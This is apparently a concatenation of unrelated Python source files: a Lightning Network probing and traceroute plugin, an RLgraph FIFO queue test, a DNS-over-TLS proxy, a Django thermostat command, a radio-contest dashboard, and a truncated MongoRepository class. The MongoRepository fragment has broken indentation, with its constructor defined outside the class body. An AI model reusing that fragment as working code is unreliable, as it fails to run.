            'route': self.route,
            'erring_channel': self.erring_channel,
            'failcode': self.failcode,
            'started_at': str(self.started_at),
            'finished_at': str(self.finished_at),
        }
def start_probe(plugin):
    """Kick off one probe to a random node on a daemon thread."""
    worker = threading.Thread(target=probe, args=[plugin, None])
    worker.daemon = True
    worker.start()
@plugin.async_method('probe')
def probe(plugin, request, node_id=None, **kwargs):
    """Send a probe payment with a random payment_hash to node_id.

    If node_id is None a random node from the gossip map is chosen.
    `request` is None when invoked from the scheduler (via start_probe);
    otherwise it is the async RPC request to answer once the probe resolves.
    """
    # Result payload; only populated on the no-route fast path below.
    res = None
    if node_id is None:
        # No destination given: pick a random node from the gossip map.
        nodes = plugin.rpc.listnodes()['nodes']
        node_id = choice(nodes)['nodeid']

    s = plugin.Session()
    p = Probe(destination=node_id, started_at=datetime.now())
    s.add(p)
    try:
        route = plugin.rpc.getroute(
            node_id,
            msatoshi=10000,
            riskfactor=1,
            exclude=exclusions + list(temporary_exclusions.keys())
        )['route']
        p.route = ','.join([r['channel'] for r in route])
        # Random payment_hash guarantees rejection at the destination.
        p.payment_hash = ''.join(choice(string.hexdigits) for _ in range(64))
    except RpcError:
        # No route found: record failcode -1 and answer immediately.
        p.failcode = -1
        res = p.jsdict()
        s.commit()
        return request.set_result(res) if request else None
    s.commit()
    plugin.rpc.sendpay(route, p.payment_hash)
    # Completion is detected asynchronously by poll_payments().
    plugin.pending_probes.append({
        'request': request,
        'probe_id': p.id,
        'payment_hash': p.payment_hash,
        'callback': complete_probe,
        'plugin': plugin,
    })
@plugin.method('traceroute')
def traceroute(plugin, node_id, **kwargs):
    """Probe successively longer prefixes of a route to node_id.

    Works like IP traceroute: for each prefix length of the computed route a
    payment with a random payment_hash is attempted, and the resulting error
    shows how far along the route the payment got.
    """
    result = {
        'destination': node_id,
        'started_at': str(datetime.now()),
        'probes': [],
    }
    try:
        result['route'] = plugin.rpc.getroute(
            result['destination'],
            msatoshi=10000,
            riskfactor=1,
        )['route']
        result['payment_hash'] = ''.join(random.choice(string.hexdigits) for _ in range(64))
    except RpcError:
        result['failcode'] = -1
        return result

    # For each prefix length, shorten the route and attempt the payment
    for prefix_length in range(1, len(result['route']) + 1):
        hop = {
            'route': result['route'][:prefix_length],
            'payment_hash': ''.join(random.choice(string.hexdigits) for _ in range(64)),
            'started_at': str(datetime.now()),
        }
        hop['destination'] = hop['route'][-1]['id']
        plugin.rpc.sendpay(hop['route'], hop['payment_hash'])
        try:
            plugin.rpc.waitsendpay(hop['payment_hash'], timeout=30)
            raise ValueError("The recipient guessed the preimage? Cryptography is broken!!!")
        except RpcError as e:
            hop['finished_at'] = str(datetime.now())
            if e.error['code'] == 200:
                # Timed-out prefix: stop probing further (not appended).
                hop['error'] = "Timeout"
                break
            else:
                hop['error'] = e.error['data']
                hop['failcode'] = e.error['data']['failcode']
        result['probes'].append(hop)
    return result
@plugin.method('probe-stats')
def stats(plugin):
    """Report counts of pending probes and the two exclusion lists."""
    return dict(
        pending_probes=len(plugin.pending_probes),
        exclusions=len(exclusions),
        temporary_exclusions=len(temporary_exclusions),
    )
def complete_probe(plugin, request, probe_id, payment_hash):
    """Finalize a probe once its sendpay has resolved.

    Records the error details on the Probe row, updates the permanent and
    temporary exclusion lists depending on the failcode, and answers the
    originating RPC request when there is one.
    """
    s = plugin.Session()
    p = s.query(Probe).get(probe_id)
    try:
        plugin.rpc.waitsendpay(p.payment_hash)
    except RpcError as e:
        error = e.error['data']
        p.erring_channel = e.error['data']['erring_channel']
        p.failcode = e.error['data']['failcode']
        p.error = json.dumps(error)

    # Hard channel failures: exclude the channel permanently.
    if p.failcode in [16392, 16394]:
        exclusion = "{erring_channel}/{erring_direction}".format(**error)
        print('Adding exclusion for channel {} ({} total))'.format(
            exclusion, len(exclusions))
        )
        exclusions.append(exclusion)

    # Transient failures: exclude the channel for a limited time only.
    if p.failcode in [21, 4103]:
        exclusion = "{erring_channel}/{erring_direction}".format(**error)
        print('Adding temporary exclusion for channel {} ({} total))'.format(
            exclusion, len(temporary_exclusions))
        )
        expiry = time() + plugin.probe_exclusion_duration
        temporary_exclusions[exclusion] = expiry

    p.finished_at = datetime.now()
    res = p.jsdict()
    s.commit()
    s.close()
    # Bug fix: scheduler-started probes (start_probe -> probe(plugin, None))
    # carry request=None; calling set_result on None raised AttributeError.
    if request is not None:
        request.set_result(res)
def poll_payments(plugin):
    """Iterate through all probes and complete the finalized ones.

    Bug fix: the original removed entries from plugin.pending_probes while
    iterating the same list, which skips the element after every removal --
    iterate over a snapshot instead.
    """
    for probe in list(plugin.pending_probes):
        p = plugin.rpc.listsendpays(None, payment_hash=probe['payment_hash'])
        if p['payments'][0]['status'] == 'pending':
            continue
        plugin.pending_probes.remove(probe)
        # The callback receives the remaining entry fields as kwargs.
        cb = probe['callback']
        del probe['callback']
        cb(**probe)
def clear_temporary_exclusion(plugin):
    """Drop temporary channel exclusions whose expiry time has passed."""
    expired = [chan for chan, expiry in temporary_exclusions.items() if expiry < time()]
    for chan in expired:
        del temporary_exclusions[chan]
    print("Removed {}/{} temporary exclusions.".format(
        len(expired), len(temporary_exclusions))
    )
def schedule(plugin):
    """Run the periodic jobs forever, ordered by a min-heap of next run times."""
    # Each entry is (next_run_time, function, interval_seconds).
    jobs = [
        (time() + 300, clear_temporary_exclusion, 300),
        (time() + plugin.probe_interval, start_probe, plugin.probe_interval),
        (time() + 1, poll_payments, 1),
    ]
    heapq.heapify(jobs)
    while True:
        when, fn, interval = heapq.heappop(jobs)
        delay = when - time()
        if delay > 0:
            sleep(delay)
        # Call the function
        fn(plugin)
        # Schedule the next run
        heapq.heappush(jobs, (time() + interval, fn, interval))
@plugin.init()
def init(configuration, options, plugin):
    """Plugin startup: read options, set up the SQLite DB, start the scheduler."""
    plugin.probe_interval = int(options['probe-interval'])
    plugin.probe_exclusion_duration = int(options['probe-exclusion-duration'])

    # Store probe results in probes.db inside the lightning directory.
    db_filename = 'sqlite:///' + os.path.join(
        configuration['lightning-dir'],
        'probes.db'
    )

    engine = create_engine(db_filename, echo=True)
    Base.metadata.create_all(engine)
    plugin.Session = sessionmaker()
    plugin.Session.configure(bind=engine)
    # Daemon thread so the scheduler never blocks plugin shutdown.
    t = threading.Thread(target=schedule, args=[plugin])
    t.daemon = True
    t.start()
# Probes that are still pending and need to be checked against.
plugin.pending_probes = []

# Register configurable options, then hand control to the plugin event loop.
plugin.add_option(
    'probe-interval',
    '3600',
    'How many seconds should we wait between probes?'
)
plugin.add_option(
    'probe-exclusion-duration',
    '1800',
    'How many seconds should temporarily failed channels be excluded?'
)
plugin.run()
|
test_fifo_queue.py | # Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import threading
import time
import unittest
from rlgraph.components.memories.fifo_queue import FIFOQueue
from rlgraph.spaces import Dict, BoolBox, Tuple
from rlgraph.tests import ComponentTest
from rlgraph.utils.ops import flatten_op, unflatten_op
class TestFIFOQueue(unittest.TestCase):
    """
    Tests sampling and insertion behaviour of the FIFOQueue class.
    """
    # Batched record space describing what the queue stores per time step.
    record_space = Dict(
        states=dict(state1=float, state2=float, state3=bool),
        actions=dict(action1=float, action2=Tuple(float, float)),
        reward=float,
        terminals=BoolBox(),
        add_batch_rank=True
    )
    capacity = 10

    input_spaces = dict(
        records=record_space,
        num_records=int
    )

    def test_enqueue_dequeue(self):
        """
        Simply tests insert op without checking internal logic.
        """
        fifo_queue = FIFOQueue(capacity=self.capacity, record_space=self.record_space)
        test = ComponentTest(component=fifo_queue, input_spaces=self.input_spaces)

        first_record = self.record_space.sample(size=1)
        test.test(("insert_records", first_record), expected_outputs=None)
        test.test("get_size", expected_outputs=1)

        further_records = self.record_space.sample(size=5)
        test.test(("insert_records", further_records), expected_outputs=None)
        test.test("get_size", expected_outputs=6)

        # FIFO order: expect the first record followed by 4 of the later batch.
        expected = dict()
        for (k1, v1), (k2, v2) in zip(flatten_op(first_record).items(), flatten_op(further_records).items()):
            expected[k1] = np.concatenate((v1, v2[:4]))
        expected = unflatten_op(expected)

        test.test(("get_records", 5), expected_outputs=expected)
        test.test("get_size", expected_outputs=1)

    def test_capacity(self):
        """
        Tests if insert correctly blocks when capacity is reached.
        """
        fifo_queue = FIFOQueue(capacity=self.capacity, record_space=self.record_space)
        test = ComponentTest(component=fifo_queue, input_spaces=self.input_spaces)

        def run(expected_):
            # Wait n seconds.
            time.sleep(2)
            # Pull something out of the queue again to continue.
            test.test(("get_records", 2), expected_outputs=expected_)

        # Insert one more element than capacity
        records = self.record_space.sample(size=self.capacity + 1)
        # The helper thread dequeues 2, so it should see the first 2 records.
        expected = dict()
        for key, value in flatten_op(records).items():
            expected[key] = value[:2]
        expected = unflatten_op(expected)
        # Start thread to save this one from getting stuck due to capacity overflow.
        thread = threading.Thread(target=run, args=(expected,))
        thread.start()

        print("Going over capacity: blocking ...")
        test.test(("insert_records", records), expected_outputs=None)
        print("Dequeued some items in another thread. Unblocked.")

        thread.join()

    def test_fifo_queue_with_distributed_tf(self):
        """
        Tests if FIFO is correctly shared between two processes running in distributed tf.
        """
        cluster_spec = dict(source=["localhost:22222"], target=["localhost:22223"])

        def run1():
            fifo_queue_1 = FIFOQueue(capacity=self.capacity, device="/job:source/task:0/cpu")
            test_1 = ComponentTest(component=fifo_queue_1, input_spaces=self.input_spaces, execution_spec=dict(
                mode="distributed",
                distributed_spec=dict(job="source", task_index=0, cluster_spec=cluster_spec)
            ))
            # Insert elements from source.
            records = self.record_space.sample(size=self.capacity)
            print("inserting into source-side queue ...")
            test_1.test(("insert_records", records), expected_outputs=None)
            print("size of source-side queue:")
            print(test_1.test("get_size", expected_outputs=None))
            # Pull one sample out.
            print("pulling from source-side queue:")
            print(test_1.test(("get_records", 2), expected_outputs=None))

            test_1.terminate()

        def run2():
            fifo_queue_2 = FIFOQueue(capacity=self.capacity, device="/job:source/task:0/cpu")
            test_2 = ComponentTest(component=fifo_queue_2, input_spaces=self.input_spaces, execution_spec=dict(
                mode="distributed",
                distributed_spec=dict(job="target", task_index=0, cluster_spec=cluster_spec)
            ))
            # Dequeue elements in target.
            print("size of target-side queue:")
            print(test_2.test("get_size", expected_outputs=None))
            print("pulling from target-side queue:")
            print(test_2.test(("get_records", 5), expected_outputs=None))

            test_2.terminate()

        # Start thread to save this one from getting stuck due to capacity overflow.
        thread_1 = threading.Thread(target=run1)
        thread_2 = threading.Thread(target=run2)
        thread_1.start()
        thread_2.start()
        thread_1.join()
        thread_2.join()
|
dnsOverTlsProxy.py | from dnsOverTlsApp import dot
import socket
import threading
from logger import logger
class DnsProxyServer(object):
    """Plain-TCP DNS proxy that resolves names through a DNS-over-TLS upstream.

    Listens on host:port and, for client messages of the form
    "domain:<url>", resolves the name via the dot() client and sends the
    resulting address back to the client.
    """

    def __init__(self, host, port):
        """Initialize the listening socket (address-reusable, bound to host:port)."""
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))

    def resolve(self, url):
        """Function resolves a url/domain to the Corresponding DNS Record
        Since We are using TCP DNS We PREPEND The length of the message (packet_length) REF - RFC7766 #section-8
        Establishes a TLS conn with cloudfare and returns the Response
        @params - url - the domain/url/hostname
        """
        dns_tls_client = dot()
        # NOTE(review): bytes.encode("hex") is Python-2-only; this module
        # appears to target Python 2 -- confirm before porting.
        tcp_packet = dns_tls_client.buildPacket(url).encode("hex")
        packet_length = dns_tls_client.getLength(tcp_packet)
        message = packet_length + tcp_packet
        conn = dns_tls_client.connect()
        dns_response = dns_tls_client.sendMessage(message, conn)
        ip = dns_tls_client.extractIp(dns_response)
        return ip

    def listen(self):
        """Function creates different Threads for parallel socket processing via python inbuilt threading """
        self.sock.listen(5)
        while True:
            client, address = self.sock.accept()
            client.settimeout(60)
            threading.Thread(target=self.listenToClient, args=(client, address)).start()

    def listenToClient(self, client, address):
        """Function will listen to client on TCP 53 and check for messages with format "domain:url" and calls resolve subroutine
        @params client - The TCP client which will talk to the callee
        """
        size = 1024
        while True:
            try:
                data = client.recv(size)
                logger.debug(data)
                if data:
                    query = str(data).split(":")
                    if query[0] == 'domain':
                        # Set the response to echo back the received data
                        url = query[1]
                        dns_response = self.resolve(url)
                        logger.info("{0} retrieved for DNS query on {1}".format(dns_response, url))
                        client.send(dns_response)
                else:
                    # Bug fix: previously `raise error(...)` referenced an
                    # undefined name (NameError); raise a real exception so
                    # the disconnect path is explicit.
                    raise Exception('Client disconnected')
            except Exception:
                # Bug fix: narrowed from a bare `except:` so SystemExit and
                # KeyboardInterrupt are no longer swallowed.
                client.close()
                return False
# Entry point: serve plain-TCP DNS on port 53, all interfaces.
if __name__ == "__main__":
    port_num = 53
    DnsProxyServer('', port_num).listen()
|
evaluate_therm_daemon.py | from django.core.management.base import BaseCommand, CommandError
from django_thermostat.rules import evaluate
from time import localtime, strftime, sleep
#import threading
import multiprocessing
import logging
from django.conf import settings
logger = logging.getLogger("thermostat.rules")
logger.setLevel(settings.LOG_LEVEL)
class Command(BaseCommand):
    """Management command that periodically evaluates heater rules in a subprocess."""
    args = '<sleep_time>'
    # Typo fix: "realted" -> "related" in the user-facing help text.
    help = 'Evaluate rules related to heater status. The result will start or stop the heater. It will loop and sleep for sleep_time seconds'

    def handle(self, *args, **options):
        """Loop forever: spawn an `evaluate` subprocess, then sleep args[0] seconds.

        Any exception (including the missing-argument ValueError) is reported
        to stderr and to the "thermostat.rules" logger, then the command exits.
        """
        try:
            p = multiprocessing.current_process()
            p.name = "main_therm_daemon"
            if len(args) != 1:
                raise ValueError("Missing sleep_time")
            while True:
                logger.info("Starting at %s" % strftime("%d.%m.%Y %H:%M:%S", localtime()))
                # Daemon subprocess so rule evaluation cannot outlive the command.
                d = multiprocessing.Process(name='therm_daemon', target=evaluate)
                d.daemon = True
                logger.debug("Created subprocess object")
                d.start()
                # Bug fix: was `logging.info`, which logged via the root logger
                # and bypassed the configured "thermostat.rules" logger.
                logger.info("Subprocess started, main process sleeping for the next %s seconds" % args[0])
                sleep(float(args[0]))
        except Exception as ex:
            self.stderr.write("ERROR: %s" % ex)
            logger.error("Error: %s" % ex)
|
dashboard.py | #!/usr/bin/python3
"""
n1mm_view dashboard
This program displays QSO statistics collected by the collector.
"""
from datetime import datetime
import logging
import os
import gc
import multiprocessing
import pygame
import sqlite3
import sys
import time
import config
import dataaccess
import graphics
__author__ = 'Jeffrey B. Otterson, N1KDO'
__copyright__ = 'Copyright 2016, 2017, 2019 Jeffrey B. Otterson'
__license__ = 'Simplified BSD'
# Indexes into the rotating image carousel shown by the dashboard.
LOGO_IMAGE_INDEX = 0
QSO_COUNTS_TABLE_INDEX = 1
QSO_RATES_TABLE_INDEX = 2
QSO_OPERATORS_PIE_INDEX = 3
QSO_OPERATORS_TABLE_INDEX = 4
QSO_STATIONS_PIE_INDEX = 5
QSO_BANDS_PIE_INDEX = 6
QSO_MODES_PIE_INDEX = 7
QSO_RATE_CHART_IMAGE_INDEX = 8
SECTIONS_WORKED_MAP_INDEX = 9
IMAGE_COUNT = 10

# Message types for payloads sent over the inter-process queue.
IMAGE_MESSAGE = 1
CRAWL_MESSAGE = 2

# Pixel format used with pygame.image.frombuffer for received images.
IMAGE_FORMAT = 'RGB'
SAVE_PNG = False

logging.basicConfig(format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S',
                    level=config.LOG_LEVEL)
logging.Formatter.converter = time.gmtime  # log timestamps in UTC
def load_data(size, q, last_qso_timestamp):
    """
    Load data from the database tables and enqueue freshly rendered charts.

    :param size: (width, height) to render chart images at
    :param q: multiprocessing queue receiving IMAGE_MESSAGE / CRAWL_MESSAGE payloads
    :param last_qso_timestamp: timestamp of the newest QSO already processed
    :return: timestamp of the newest QSO in the database, or the passed-in
             last_qso_timestamp when the database could not be read
    """
    logging.debug('load data')

    qso_operators = []
    qso_stations = []
    qso_band_modes = []
    operator_qso_rates = []
    qsos_per_hour = []
    qsos_by_section = {}

    db = None
    cursor = None  # guard so the finally block never touches an unbound name
    data_updated = False

    try:
        logging.debug('connecting to database')
        db = sqlite3.connect(config.DATABASE_FILENAME)
        cursor = db.cursor()
        logging.debug('database connected')

        # get timestamp from the last record in the database
        last_qso_time, message = dataaccess.get_last_qso(cursor)

        logging.debug('old_timestamp = %d, timestamp = %d', last_qso_timestamp, last_qso_time)
        if last_qso_time != last_qso_timestamp:
            logging.debug('data updated!')
            data_updated = True
            q.put((CRAWL_MESSAGE, 3, message))

            # load qso_operators
            qso_operators = dataaccess.get_operators_by_qsos(cursor)

            # load qso_stations -- maybe useless chartjunk
            qso_stations = dataaccess.get_station_qsos(cursor)

            # get something else.
            qso_band_modes = dataaccess.get_qso_band_modes(cursor)

            # load QSOs per Hour by Operator
            operator_qso_rates = dataaccess.get_qsos_per_hour_per_operator(cursor, last_qso_time)

            # load QSO rates per Hour by Band
            qsos_per_hour, qsos_per_band = dataaccess.get_qsos_per_hour_per_band(cursor)

        # load QSOs by Section. This has to be done even if no new QSO to
        # advance gray line and since the map is always drawn.
        qsos_by_section = dataaccess.get_qsos_by_section(cursor)
        q.put((CRAWL_MESSAGE, 0, ''))
        logging.debug('load data done')
    except sqlite3.OperationalError as error:
        logging.exception(error)
        q.put((CRAWL_MESSAGE, 0, 'database read error', graphics.YELLOW, graphics.RED))
        # Bug fix: previously returned None here, clobbering the caller's
        # last_qso_timestamp; keep the old timestamp so the next poll retries.
        return last_qso_timestamp
    finally:
        if db is not None:
            logging.debug('Closing DB')
            if cursor is not None:
                cursor.close()
            db.close()
            db = None

    if data_updated:
        try:
            image_data, image_size = graphics.qso_summary_table(size, qso_band_modes)
            enqueue_image(q, QSO_COUNTS_TABLE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_rates_table(size, operator_qso_rates)
            enqueue_image(q, QSO_RATES_TABLE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_operators_graph(size, qso_operators)
            enqueue_image(q, QSO_OPERATORS_PIE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_operators_table(size, qso_operators)
            enqueue_image(q, QSO_OPERATORS_TABLE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_stations_graph(size, qso_stations)
            enqueue_image(q, QSO_STATIONS_PIE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_bands_graph(size, qso_band_modes)
            enqueue_image(q, QSO_BANDS_PIE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_modes_graph(size, qso_band_modes)
            enqueue_image(q, QSO_MODES_PIE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
        try:
            image_data, image_size = graphics.qso_rates_chart(size, qsos_per_hour)
            enqueue_image(q, QSO_RATE_CHART_IMAGE_INDEX, image_data, image_size)
        except Exception as e:
            logging.exception(e)
    # The section map is redrawn on every pass (per the comment above) so the
    # gray line keeps advancing even without new QSOs.
    try:
        image_data, image_size = graphics.draw_map(size, qsos_by_section)
        enqueue_image(q, SECTIONS_WORKED_MAP_INDEX, image_data, image_size)
        gc.collect()
    except Exception as e:
        logging.exception(e)

    return last_qso_time
def enqueue_image(q, image_id, image_data, size):
    """Post a rendered image to the UI queue; silently skip empty renders."""
    if image_data is None:
        return
    q.put((IMAGE_MESSAGE, image_id, image_data, size))
def delta_time_to_string(delta_time):
    """Format a timedelta as 'D days, HH:MM:SS', omitting the day part when zero."""
    total = delta_time.total_seconds()
    days, remainder = divmod(total, 86400)
    hours, remainder = divmod(remainder, 3600)
    minutes, secs = divmod(remainder, 60)
    if days == 0:
        return '%02d:%02d:%02d' % (hours, minutes, secs)
    return '%d days, %02d:%02d:%02d' % (days, hours, minutes, secs)
def update_crawl_message(crawl_messages):
    """Refresh the static crawl slots: event name, clock, and event countdown."""
    crawl_messages.set_message(0, config.EVENT_NAME)
    crawl_messages.set_message_colors(0, graphics.BRIGHT_BLUE, graphics.BLACK)
    now = datetime.utcnow()
    crawl_messages.set_message(1, datetime.strftime(now, '%H:%M:%S'))
    if now < config.EVENT_START_TIME:
        # Event has not started yet: count down, turning red in the last hour.
        remaining = config.EVENT_START_TIME - now
        background = graphics.BLUE if remaining.total_seconds() > 3600 else graphics.RED
        crawl_messages.set_message(2, '%s starts in %s' % (config.EVENT_NAME, delta_time_to_string(remaining)))
        crawl_messages.set_message_colors(2, graphics.WHITE, background)
    elif now < config.EVENT_END_TIME:
        # Event is running: count down to the end, orange in the last hour.
        remaining = config.EVENT_END_TIME - now
        foreground = graphics.YELLOW if remaining.total_seconds() > 3600 else graphics.ORANGE
        crawl_messages.set_message(2, '%s ends in %s' % (config.EVENT_NAME, delta_time_to_string(remaining)))
        crawl_messages.set_message_colors(2, foreground, graphics.BLACK)
    else:
        crawl_messages.set_message(2, '%s is over.' % config.EVENT_NAME)
        crawl_messages.set_message_colors(2, graphics.RED, graphics.BLACK)
class CrawlMessages:
    """
    class to manage a crawl of varied text messages on the bottom of the display
    """
    def __init__(self, screen, size):
        self.screen = screen
        self.size = size
        # Fixed number of message slots; empty strings are skipped when crawling.
        self.messages = [''] * 10
        self.message_colors = [(graphics.GREEN, graphics.BLACK)] * 10
        self.message_surfaces = None   # rendered surfaces currently scrolling
        self.last_added_index = -1     # slot index of the last surface rendered
        self.first_x = -1              # x position of the leftmost surface

    def set_message(self, index, message):
        # Out-of-range indexes are silently ignored.
        if index >= 0 and index < len(self.messages):
            self.messages[index] = message

    def set_message_colors(self, index, fg, bg):
        # Out-of-range indexes are silently ignored.
        if index >= 0 and index < len(self.messages):
            self.message_colors[index] = (fg, bg)

    def crawl_message(self):
        """Advance the crawl by one step and blit it to the bottom of the screen."""
        # Lazy first-time setup: render slot 0 starting at the right edge.
        if self.message_surfaces is None:
            self.message_surfaces = [graphics.view_font.render(' ' + self.messages[0] + ' ', True,
                                                               self.message_colors[0][0],
                                                               self.message_colors[0][1])]
            self.first_x = self.size[0]
            self.last_added_index = 0
        self.first_x -= 2  # JEFF -- scroll speed: 2 pixels per call
        rect = self.message_surfaces[0].get_rect()
        if self.first_x + rect.width < 0:
            # Leftmost surface has scrolled fully off-screen; drop it.
            self.message_surfaces = self.message_surfaces[1:]
            self.first_x = 0
        # Compute the x position just past the last rendered surface.
        x = self.first_x
        for surf in self.message_surfaces:
            rect = surf.get_rect()
            x = x + rect.width
        # Fill the remaining width with the next non-empty message slot(s).
        while x < self.size[0]:
            self.last_added_index += 1
            if self.last_added_index >= len(self.messages):
                self.last_added_index = 0
            if self.messages[self.last_added_index] != '':
                surf = graphics.view_font.render(' ' + self.messages[self.last_added_index] + ' ', True,
                                                 self.message_colors[self.last_added_index][0],
                                                 self.message_colors[self.last_added_index][1])
                rect = surf.get_rect()
                self.message_surfaces.append(surf)
                x += rect.width
        # Blit every visible surface along the bottom edge of the screen.
        x = self.first_x
        for surf in self.message_surfaces:
            rect = surf.get_rect()
            rect.bottom = self.size[1] - 1
            rect.left = x
            self.screen.blit(surf, rect)
            x += rect.width
            if x >= self.size[0]:
                break
def update_charts(q, event, size):
    """Child-process body: re-render chart images every DATA_DWELL_TIME seconds.

    :param q: multiprocessing queue used to send images / crawl messages to the UI
    :param event: multiprocessing Event set by the parent to request shutdown
    :param size: (width, height) of the chart drawing area
    """
    try:
        os.nice(10)  # lower our priority so the UI process stays responsive
    except AttributeError:
        # os.nice does not exist on Windows.
        # Bug fix: logging.warn is a deprecated alias of logging.warning.
        logging.warning("can't be nice to windows")
    q.put((CRAWL_MESSAGE, 4, 'Chart engine starting...'))
    last_qso_timestamp = 0
    q.put((CRAWL_MESSAGE, 4, ''))
    try:
        while not event.is_set():
            t0 = time.time()
            # load_data may return None on a database error; keep the previous
            # timestamp in that case so the next pass retries cleanly.
            updated_timestamp = load_data(size, q, last_qso_timestamp)
            if updated_timestamp is not None:
                last_qso_timestamp = updated_timestamp
            t1 = time.time()
            delta = t1 - t0
            update_delay = config.DATA_DWELL_TIME - delta
            if update_delay < 0:
                update_delay = config.DATA_DWELL_TIME
            logging.debug('Next data update in %f seconds', update_delay)
            # event.wait doubles as an interruptible sleep.
            event.wait(update_delay)
    except Exception as e:
        logging.exception('Exception in update_charts', exc_info=e)
        q.put((CRAWL_MESSAGE, 4, 'Chart engine failed.', graphics.YELLOW, graphics.RED))
def change_image(screen, size, images, image_index, delta):
    """Step through `images` by `delta`, wrapping around and skipping empty
    (None) slots, then display the selected image and return its index."""
    idx = image_index
    while True:
        idx += delta
        if idx >= len(images):
            idx = 0
        elif idx < 0:
            idx = len(images) - 1
        if images[idx] is not None:
            break
    graphics.show_graph(screen, size, images[idx])
    return idx
def main():
    """Top-level UI loop: start the chart-update process and run pygame events."""
    logging.info('dashboard startup')
    last_qso_timestamp = 0
    q = multiprocessing.Queue()
    process_event = multiprocessing.Event()
    images = [None] * IMAGE_COUNT
    try:
        screen, size = graphics.init_display()
    except Exception as e:
        logging.exception('Could not initialize display.', exc_info=e)
        sys.exit(1)
    # Reserve the bottom strip (one font line) for the crawl messages.
    display_size = (size[0], size[1] - graphics.view_font_height)
    logging.debug('display setup')
    images[LOGO_IMAGE_INDEX] = pygame.image.load('logo.png')
    crawl_messages = CrawlMessages(screen, size)
    update_crawl_message(crawl_messages)
    # Chart rendering happens in a separate process; images arrive via q.
    proc = multiprocessing.Process(name='image-updater', target=update_charts, args=(q, process_event, display_size))
    proc.start()
    try:
        image_index = LOGO_IMAGE_INDEX
        graphics.show_graph(screen, size, images[LOGO_IMAGE_INDEX])
        # 1 Hz timer event drives the clock and the dwell-time countdown.
        pygame.time.set_timer(pygame.USEREVENT, 1000)
        run = True
        paused = False
        display_update_timer = config.DISPLAY_DWELL_TIME
        clock = pygame.time.Clock()
        while run:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    run = False
                    break
                elif event.type == pygame.USEREVENT:
                    # Once per second: count down and rotate (or refresh) the image.
                    display_update_timer -= 1
                    if display_update_timer < 1:
                        if paused:
                            graphics.show_graph(screen, size, images[image_index])
                        else:
                            image_index = change_image(screen, size, images, image_index, 1)
                        display_update_timer = config.DISPLAY_DWELL_TIME
                    update_crawl_message(crawl_messages)
                elif event.type == pygame.KEYDOWN:
                    # q = quit, n/right-arrow = next, p/left-arrow = previous,
                    # scroll-lock (302) = toggle pause.
                    if event.key == ord('q'):
                        logging.debug('Q key pressed')
                        run = False
                    elif event.key == ord('n') or event.key == 275:
                        logging.debug('next key pressed')
                        image_index = change_image(screen, size, images, image_index, 1)
                        display_update_timer = config.DISPLAY_DWELL_TIME
                    elif event.key == ord('p') or event.key == 276:
                        logging.debug('prev key pressed')
                        image_index = change_image(screen, size, images, image_index, -1)
                        display_update_timer = config.DISPLAY_DWELL_TIME
                    elif event.key == 302:
                        logging.debug('scroll lock key pressed')
                        if paused:
                            image_index = change_image(screen, size, images, image_index, 1)
                            display_update_timer = config.DISPLAY_DWELL_TIME
                        paused = not paused
                    else:
                        logging.debug('event key=%d', event.key)
            # Drain the queue: updated chart images and crawl messages.
            while not q.empty():
                payload = q.get()
                message_type = payload[0]
                if message_type == IMAGE_MESSAGE:
                    n = payload[1]
                    image = payload[2]
                    image_size = payload[3]
                    images[n] = pygame.image.frombuffer(image, image_size, IMAGE_FORMAT)
                    logging.debug('received image %d', n)
                elif message_type == CRAWL_MESSAGE:
                    n = payload[1]
                    message = payload[2]
                    # Optional trailing payload items override the default colors.
                    fg = graphics.CYAN
                    bg = graphics.BLACK
                    if len(payload) > 3:
                        fg = payload[3]
                    if len(payload) > 4:
                        bg = payload[4]
                    crawl_messages.set_message(n, message)
                    crawl_messages.set_message_colors(n, fg, bg)
            crawl_messages.crawl_message()
            pygame.display.flip()
            clock.tick(60)
        # Disable the 1 Hz timer before shutting down.
        pygame.time.set_timer(pygame.USEREVENT, 0)
    except Exception as e:
        logging.exception("Exception in main:", exc_info=e)
    pygame.display.quit()
    logging.debug('stopping update process')
    process_event.set()
    logging.debug('waiting for update process to stop...')
    proc.join(60)
    if proc.is_alive():
        logging.warn('chart engine did not exit upon request, killing.')
        proc.terminate()
    logging.debug('update thread has stopped.')
    logging.info('dashboard exit')
# Script entry point.
if __name__ == '__main__':
    main()
|
MongoRepository.py | import cPickle as pickle
import logging
import os
import time
from threading import Lock, Thread
from pymongo import MongoClient
class MongoRepository(object):
def __init__(self, connection_string, database, collection, resume_token_path='resume_token.bin', logger_name=None, *time_fields):
    """
    MongoCollection wrapper class to allow easy specialized updates.
    :param connection_string: MongoDB connection string
    :param database: Database to use
    :param collection: Collection to use
    :param resume_token_path: File path to the resume token file. This file is needed to resume consumption
    of the event stream after new start of the process. Default value is "resume_token.bin" in the current directory.
    :param logger_name: Name passed to logging.getLogger for this repository's logger
    :param time_fields: Any timeFields that should be set to the current time whenever the collection is updated
    """
    client = MongoClient(connection_string, document_class=dict)
    db = client[database]
    self.coll = db[collection]
    self.time_fields = list(time_fields)
    # Save throttling state -- presumably used by the resume-token
